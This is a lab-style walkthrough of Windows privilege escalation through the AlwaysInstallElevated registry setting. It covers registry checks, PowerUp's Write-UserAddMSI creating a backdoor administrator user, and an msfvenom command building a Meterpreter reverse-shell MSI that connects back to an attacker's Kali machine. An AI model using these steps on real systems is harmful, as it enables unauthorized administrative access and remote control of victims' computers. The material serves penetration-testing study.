💽AlwaysInstallElevated

AlwaysInstallElevated is a functionality within Windows that allows all users, including non-administrative ones, to automatically run any MSI (Microsoft Installer) file with elevated privileges. This capability can be exploited in the context of Windows privilege escalation. When an attacker leverages the AlwaysInstallElevated setting, they can manipulate MSI packages to execute arbitrary code with elevated permissions, potentially leading to unauthorized access and control over the system.

To escalate privileges using AlwaysInstallElevated, attackers can create and deploy malicious MSI files, taking advantage of the automatic elevation granted by this setting. By doing so, they can execute code in the context of higher-privileged accounts, achieving a form of privilege escalation.

first we need to check if AlwaysInstallElevated is =1 :

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

now in the cms we do:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

1. reg query HKLM\Software\Policies\Microsoft\Windows\Installer queries the local machine's registry for Windows Installer policies at the system level [1].

2. reg query HKCU\Software\Policies\Microsoft\Windows\Installer queries the current user's registry for Windows Installer policies specific to that user [1].

These commands target different registry hives. The former looks at the machine-wide settings, affecting all users, while the latter focuses on settings applicable only to the currently logged-in user.

Microsoft - reg query

Let's chech who is in the administrators localgroup:

net localgroup administrators

The net localgroup administrators command is used to display a list of users who are members of the local "Administrators" group on a Windows computer. When you run this command in the command prompt, it provides information about the users belonging to the administrators group, offering insights into the local administrative privileges on the system

• Wikiversity - Net (command)/Localgroup

• Microsoft - Net localgroup

In the autorun section we launched the PowerUp tool:

we are going to use it now

We simply look for the AlwaysInstallElevated part in the script output

so it pretty much tells us that the abuse function for AlwaysInstallElevated is Write-UserAddMSI

1. Function Purpose: "Write-UserAddMSI" is designed to exploit the "AlwaysInstallElevated" registry setting in Windows. This setting allows non-administrative users to install Microsoft Installer Packages (MSI) with elevated privileges.

2. Malicious MSI Creation: The function likely facilitates the creation of a malicious MSI package that, when executed, performs unauthorized actions or grants elevated privileges to a user.

3. Privilege Escalation: By abusing "AlwaysInstallElevated" with "Write-UserAddMSI," an attacker can escalate their privileges, potentially gaining administrative access on the system.

4. Backdoor Installation: It suggests the ability to install a backdoor or perform actions that may compromise the security of the system.

5. Juggernaut Security - AlwaysInstallElevated – Windows Privilege Escalation

6. Hacking Articles - Windows Privilege Escalation (AlwaysInstallElevated)

7. HackTricks - Windows Local Privilege Escalation

8. Offsec Journey - Local Priv Esc - Windows

So now let's abuse this, let's do a

Write-UserAddMSI

In essence, the command is instructing PowerSploit to create a new MSI file named "UserAdd.msi" in the local directory. This MSI file contains configurations or instructions for adding a user, that will be abused for privesc

if we go and look in the local file, we can see some change:

we double-click on it and see some interesting stuff:

it asks us to add a user in the administrators group, check mate

and if we run the command again:

our backdoor user has been added to the group

Let's do this another way,

on your local kali open a msfconsole reverse shell:

now in another terminal you run this:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

• msfvenom: This is the command-line interface for Metasploit's payload generator.

• -p windows/meterpreter/reverse_tcp: Specifies the payload to be generated. In this case, it's a reverse TCP Meterpreter shell for a Windows target.

• lhost=[Kali VM IP Address]: Sets the listening host IP address. Replace [Kali VM IP Address] with the actual IP address of your Kali Linux machine. This is the IP where the target machine will connect back.

• -f msi: Specifies the format of the output file. Here, it's set to MSI (Microsoft Installer).

• -o setup.msi: Specifies the output file name, which is set to setup.msi. This is the name of the generated MSI file.

Now we need to upload this payload on our target so let's go and make a local http server:

didn't make a very secure place for our server, but hey, better work next time,

and now on our listener:

just like that, another way of obtaining a shell 😄